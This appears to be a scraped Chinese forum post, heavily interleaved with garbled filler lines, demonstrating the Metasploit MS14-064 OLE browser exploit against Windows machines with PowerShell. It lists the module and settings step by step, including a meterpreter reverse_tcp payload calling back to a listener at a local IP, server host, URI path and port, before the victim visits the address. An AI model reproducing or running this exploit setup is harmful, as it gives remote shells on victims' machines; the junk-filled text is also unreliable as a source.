. E, M& D, S( D- b9 [2 z
我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
4 n, \, ~- L: a2 s
& ?8 N% y6 T3 j' x$ Q
4 K: L- @5 O9 s% ^( {* @+ |/ ^ 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
$ e% L/ M; {5 v) i3 n+ `
" g1 F9 o; `- B: K t% o
+ [, w5 ~4 S" p, W 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp# x% Y7 Q: ]0 @4 \" T, C0 j, m
, n8 R# e4 [2 m1 v1 C: h
4 B8 Q. k8 ^; P$ m set AllowPowershellPrompt true
4 V+ ~. N T; N K0 I
* _' _, O9 g) h4 g: H
- z$ W8 C% p7 G& j8 y Set LHOST 192.168.0.109- ]$ d1 G7 ~; S& g1 [, O% ~2 a
8 _, e h: J, w" t) I [: k6 ]9 E' l
set SRVHOST 192.168.0.109
! Z1 e* ~% B& m. q* E; a* a) N5 s, g
: [6 b3 {; K2 D- _( W1 M( I
* a/ s" H6 M7 V' |2 {. ?# E Set uripath share
3 H e ?! H/ F" b& ~3 x7 z
+ m- Y3 t% `" {
$ N9 X v( Y) x! S+ k
Set srvport 80: w0 h, _0 K% `( l* u
: ?, ]: R: j6 b5 B) A
) ]9 t" J+ E& C; S" A# _" b
0 K0 o8 @; k* n6 _
' h" H# Y, @; a4 ]: @6 [4 x
# N; l+ ^, I( o
( ]" ^* p h8 P& F" b* f. P4 y# z
2 k% x6 S4 G$ ^% O8 ?; j, b
2 \/ D+ A! n7 o2 [# } ] ' O9 ]! \8 l8 @, P" J
/ j6 v1 r; y& q# z8 x" Z* H+ b4 M$ t2 p9 t6 Z! r
3 D* N+ N, j! |" Z
/ b6 [0 Y4 ?0 f
& i' A6 J# G! l
# I. @8 D7 V& D- \! Z: y
]6 w' P, R7 j7 U3 Z6 l3 x$ c3 }. ^) m7 E! E" D# w( W( p
下面我们来访问本地地址如图:. B6 m, G t7 |* q' d. o3 a
& s' l0 c5 @9 s
, y; E, f: {1 @3 {: U2 |9 g# @
) m+ s6 I1 O9 V4 f, {
+ }4 z: B0 q6 v& S5 L4 B( b' t! x
V0 Z/ Q5 k& E; W2 w; s9 @
C* a$ J4 y! L
1 s$ b! e7 N" g! r4 V! N9 u
5 k& l& B2 o5 I9 F
4 G7 U+ g' `5 h- L. \